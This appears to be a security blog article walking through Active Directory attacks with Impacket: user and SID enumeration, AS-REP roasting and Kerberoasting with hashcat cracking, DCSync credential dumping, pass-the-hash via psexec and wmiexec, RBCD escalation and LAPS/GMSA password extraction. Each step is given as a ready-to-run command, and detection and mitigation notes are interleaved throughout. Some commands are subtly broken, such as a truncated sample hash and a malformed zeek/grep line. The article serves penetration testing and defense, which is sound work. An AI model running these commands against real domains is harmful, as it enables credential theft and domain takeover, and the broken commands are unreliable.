Listen to this Post
Introduction:
Active Directory (AD) remains the crown jewel of enterprise identity management, but its complexity often creates hidden attack paths that malicious actors exploit. Impacket, a powerful Python-based toolkit, provides security professionals with the ability to simulate real-world AD attacks—from enumeration to full domain compromise—without deploying invasive agents. This article dissects how red teams leverage Impacket for Kerberos attacks, credential dumping, and lateral movement, offering step‑by‑step guidance for both offensive testing and defensive hardening.
Learning Objectives:
- Enumerate AD users, SIDs, computers, and domain groups using Impacket’s `lookupsid` and `GetADUsers`
– Execute Kerberos attacks including AS-REP Roasting and Kerberoasting to extract crackable ticket hashes - Perform credential dumping via DCSync, remote command execution with
psexec/wmiexec, and abuse resource‑based constrained delegation (RBCD) for privilege escalation
You Should Know:
- Active Directory Enumeration with Impacket – Uncovering Hidden Assets
Impacket’s `lookupsid` and `GetADUsers` scripts are the first step in any AD penetration test. They reveal domain users, security identifiers (SIDs), computer objects, and group memberships without generating noisy login events. To use them, you need valid domain credentials (even low‑privileged ones) and network access to a Domain Controller.
Step‑by‑step guide (Linux – Kali Linux recommended):
1. Install Impacket via pip or from GitHub:
sudo apt install impacket-scripts Debian/Ubuntu or pip3 install impacket
2. Enumerate domain users using `GetADUsers`:
impacket-GetADUsers -dc-ip 192.168.1.10 DOMAIN/username:password
Replace `192.168.1.10` with your Domain Controller IP and provide valid credentials.
3. Perform SID brute‑forcing with `lookupsid`:
impacket-lookupsid DOMAIN/username:[email protected]
This iterates through RIDs (Relative Identifiers) to list all domain principals.
4. Enumerate computers in the domain:
impacket-netview DOMAIN/username:password -dc-ip 192.168.1.10
Windows alternative: Use PowerView from PowerSploit for similar enumeration, but Impacket’s cross‑platform nature makes it ideal for Linux‑based red team infrastructure.
2. Kerberos Attacks – AS-REP Roasting and Kerberoasting
Kerberos misconfigurations are a goldmine. AS-REP Roasting targets users with “Do not require Kerberos preauthentication” enabled, retrieving their ticket encrypted with a weak hash. Kerberoasting extracts service account tickets (TGS) encrypted with the service account’s NTLM hash—both can be cracked offline.
Step‑by‑step guide for AS-REP Roasting:
- Use `impacket-GetNPUsers` to request AS-REP for vulnerable users:
impacket-GetNPUsers -dc-ip 192.168.1.10 -request DOMAIN/ -usersfile userlist.txt
If no
-usersfile, it queries all domain users (requires authenticated context). -
Save the output hash (starting with
$krb5asrep$) to a file, e.g.,asrep_hashes.txt.
3. Crack with Hashcat (mode 18200):
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
Step‑by‑step for Kerberoasting:
- Enumerate SPNs (Service Principal Names) and request TGS tickets:
impacket-GetUserSPNs -dc-ip 192.168.1.10 -request DOMAIN/username:password
-
Output hashes (format
$krb5tgs$) are crackable with Hashcat mode 13100:hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
Defensive command (Windows – detection): Monitor Event ID 4769 (Kerberos TGS request) with suspicious ticket options or unusual encryption types. Use PowerShell:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Message -match '0x10'}
- Credential Dumping with DCSync – Simulating Domain Admin Persistence
DCSync abuses the Directory Replication Service Remote Protocol to pull password hashes directly from a Domain Controller. This attack works if an account has `Replicating Directory Changes` rights (often granted to Domain Admins or certain delegated accounts).
Step‑by‑step guide:
- Identify a user with DCSync privileges (e.g., Domain Admin or a compromised account in the “Domain Admins” group).
2. Use `impacket-secretsdump` to replicate the NTDS.dit database:
impacket-secretsdump -dc-ip 192.168.1.10 DOMAIN/admin_user:[email protected]
- The output includes NTLM hashes of all domain users, Kerberos keys, and sometimes cleartext passwords. Save the hashes for pass‑the‑hash attacks.
-
Use a retrieved NTLM hash to authenticate as any user via `psexec` or
wmiexec:impacket-psexec -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb11ad245b12e6e4f56c DOMAIN/[email protected]
Mitigation: Enforce strong delegation policies, monitor Event ID 4662 (Directory Service Access) for `DS-Replication-Get-Changes` rights, and use Protected Users group or Credential Guard.
- Remote Command Execution – Lateral Movement via PsExec and WMIExec
Impacket provides agent‑less remote execution tools that mimic legitimate admin tools. `psexec` creates a service on the target, while `wmiexec` uses WMI—both are stealthier than traditional RDP.
Step‑by‑step guide using psexec:
1. With compromised credentials or a hash, execute:
impacket-psexec DOMAIN/username:password@target_IP
Or with pass‑the‑hash:
impacket-psexec -hashes :NTLM_hash DOMAIN/username@target_IP
- You’ll receive an interactive `cmd.exe` session on the target.
Using wmiexec (less noisy):
impacket-wmiexec DOMAIN/username:password@target_IP
This uses WMI to spawn a semi‑interactive shell. For single commands:
impacket-wmiexec DOMAIN/username:password@target_IP 'whoami /all'
Windows detection: Monitor service creation events (Event ID 7045 for PsExec‑like service names) and WMI activity (Event ID 4688 with `wmic.exe` or winrm). Use Sysmon or EDR rules.
5. Privilege Escalation via Resource-Based Constrained Delegation (RBCD)
RBCD allows a machine to impersonate any user to any service. Attackers with control over a machine account (e.g., via adding a fake computer) can escalate to Domain Admin by abusing msDS-AllowedToActOnBehalfOfOtherIdentity.
Step‑by‑step guide (advanced – requires `impacket-addcomputer` and `rbcd.py`):
- Add a new computer object to the domain (if you have domain credentials):
impacket-addcomputer -dc-ip 192.168.1.10 -computer-name FAKEPC$ -computer-pass Passw0rd123 DOMAIN/username:password
-
Use `rbcd.py` to set RBCD delegation on a high‑value target (e.g., Domain Controller):
impacket-rbcd -dc-ip 192.168.1.10 -delegate-from FAKEPC$ -delegate-to DC01$ DOMAIN/username:password
-
Request a TGS for a privileged user (e.g., Administrator) to the target using
getST.py:impacket-getST -dc-ip 192.168.1.10 -spn cifs/DC01.DOMAIN.local -impersonate Administrator -hashes :hash_of_FAKEPC$ DOMAIN/FAKEPC$:Passw0rd123
-
Use the resulting ticket with `psexec` or `wmiexec` to gain full access.
Mitigation: Enforce `ms-DS-MachineAccountQuota` (default 10) to limit computer creation and monitor for unusual delegation changes.
6. Extracting LAPS and GMSA Passwords
Local Administrator Password Solution (LAPS) stores local admin passwords in AD, often readable by privileged users. Group Managed Service Accounts (GMSA) also store readable blobs. Impacket’s `secretsdump` can retrieve these when run with sufficient rights.
Step‑by‑step guide:
- Run `secretsdump` as a user with read access to the LAPS attribute (
ms-Mcs-AdmPwd):impacket-secretsdump -dc-ip 192.168.1.10 DOMAIN/admin_user:[email protected] -just-dcntlm
LAPS passwords appear in the output as
ms-Mcs-AdmPwd: password. -
For GMSA, use `impacket-gmsa` to retrieve the managed password blob:
impacket-gmsa -dc-ip 192.168.1.10 -gmsa-name GMSA_ACCOUNT$ DOMAIN/username:password
Defensive actions: Restrict LAPS read permissions to only authorized admins and rotate passwords frequently. Monitor for queries to `ms-Mcs-AdmPwd` using AD audit logs.
- Defensive Hardening and Detection – What Blue Teams Must Know
To counter Impacket‑based attacks, implement layered defenses:
- Network segmentation: Block SMB/RPC (ports 445, 135, 49152-65535) between untrusted zones.
- Deploy EDR with behavioural rules for `psexec` service creation and
secretsdump’s DRSUAPI calls. - Enable advanced logging: Enable PowerShell logging, Sysmon Event ID 1 (process creation), and audit directory service changes.
- Use JEA (Just Enough Administration) and remove unnecessary delegation rights.
- Apply Microsoft’s “Securing Privileged Access” recommendations, including Tier 0 isolation.
Linux detection command (using Zeek/Bro on network traffic):
zeek -r capture.pcap -C grep -E "drsuapi|DCERPC" /var/log/zeek/dce_rpc.log
Windows command to detect Impacket DCSync attempts (requires PowerShell and Get-WinEvent):
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | Where-Object {$_.Properties[bash].Value -eq 'DS-Replication-Get-Changes'} | Format-List
What Undercode Say:
- Impacket remains the Swiss army knife for AD penetration testing, enabling stealthy, agent‑less attacks that mimic legitimate administrative activity. Every red team must master its enumeration, Kerberos, and DCSync modules.
- Defenders cannot rely on traditional antivirus or simple log monitoring—Impacket’s use of native Windows protocols (SMB, WMI, RPC) makes it blend in. Successful blue teams must deploy behavioural analytics, restrict DCSync rights, and aggressively patch Kerberos misconfigurations.
Prediction:
As hybrid and cloud‑joined AD environments expand, Impacket’s evolution will include more Azure AD and Entra ID attack primitives. However, Microsoft’s increasing adoption of Kerberos armoring (FAST) and default hardening of preauthentication will force attackers to shift toward RBCD and golden ticket variants. Organisations that fail to implement tiered administration and continuous AD attack path monitoring will likely face compromise within months, as automated Impacket‑driven tools become standard in ransomware playbooks. The arms race between red teams using Impacket and blue teams leveraging identity threat detection (ITDR) platforms is only beginning.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Yashika Dhir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
